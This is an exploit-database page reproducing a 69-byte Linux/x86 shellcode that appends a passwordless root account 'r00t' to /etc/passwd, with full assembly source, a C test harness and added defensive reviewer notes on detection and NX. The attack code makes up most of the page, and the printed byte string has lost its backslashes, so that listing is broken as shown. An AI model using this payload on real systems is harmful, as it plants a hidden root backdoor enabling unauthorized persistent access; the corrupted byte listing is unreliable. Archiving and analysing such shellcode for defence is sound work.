
linux/x86 add root user r00t with no password to /etc/passwd 69 bytes

🗓️ 07 Feb 2007 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 10 Views

Linux/x86 shellcode to add root user with no password to /etc/passwd


                                                /* By Kris Katterjohn 11/14/2006
 *
 * 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd
 *
 * for Linux/x86
 *
 *
 *
 * section .text
 *
 *      global _start
 *
 * _start:
 *
 * ; open("/etc//passwd", O_WRONLY | O_APPEND)
 *
 *      push byte 5
 *      pop eax
 *      xor ecx, ecx
 *      push ecx
 *      push 0x64777373
 *      push 0x61702f2f
 *      push 0x6374652f
 *      mov ebx, esp
 *      mov cx, 02001Q
 *      int 0x80
 *
 *      mov ebx, eax
 *
 * ; write(ebx, "r00t::0:0:::", 12)
 *
 *      push byte 4
 *      pop eax
 *      xor edx, edx
 *      push edx
 *      push 0x3a3a3a30
 *      push 0x3a303a3a
 *      push 0x74303072
 *      mov ecx, esp
 *      push byte 12
 *      pop edx
 *      int 0x80
 *
 * ; close(ebx)
 *
 *      push byte 6
 *      pop eax
 *      int 0x80
 *
 * ; exit()
 *
 *      push byte 1
 *      pop eax
 *      int 0x80
 */

/*
 * Test harness: stores the payload in a local char array and calls that
 * array as if it were a function.
 *
 * Per the assembly in the header comment, the payload does
 * open("/etc//passwd", O_WRONLY | O_APPEND), write(fd, "r00t::0:0:::", 12),
 * close(fd) and exit(), all through int 0x80.
 *
 * Reviewer notes (defensive reading):
 *  - The open() is for writing, so the payload only has an effect in a
 *    process that may already write /etc/passwd (normally root only --
 *    confirm against the target's file permissions). It is a persistence
 *    step, not a privilege escalation in itself.
 *  - What it leaves behind is a passwd entry with UID 0, GID 0 and an empty
 *    password field. File-integrity monitoring or an audit watch on writes
 *    to /etc/passwd, plus a periodic check for extra UID-0 accounts and
 *    empty password fields, would surface it.
 *  - The array is a local variable, so the call below executes from the
 *    stack. Calling a data object through a function pointer is undefined
 *    behaviour in C, and a non-executable stack (NX/DEP) makes the call
 *    fault instead of running the bytes.
 *  - NOTE(review): the literals below appear without a backslash before
 *    each "x", so as printed they are plain ASCII text rather than the
 *    69 bytes described in the header comment -- presumably lost when the
 *    page was extracted. Treat the listing as reference material.
 */
main()
{
       /* Payload bytes, one string literal per 12 opcodes (see note above). */
       char shellcode[] =
               "x6ax05x58x31xc9x51x68x73x73x77x64x68"
               "x2fx2fx70x61x68x2fx65x74x63x89xe3x66"
               "xb9x01x04xcdx80x89xc3x6ax04x58x31xd2"
               "x52x68x30x3ax3ax3ax68x3ax3ax30x3ax68"
               "x72x30x30x74x89xe1x6ax0cx5axcdx80x6a"
               "x06x58xcdx80x6ax01x58xcdx80";

       /* Cast the array address to void (*)() and call it. */
       (*(void (*)()) shellcode)();
}


                              

07 Feb 2007 00:00Current
7.1High risk
Vulners AI Score7.1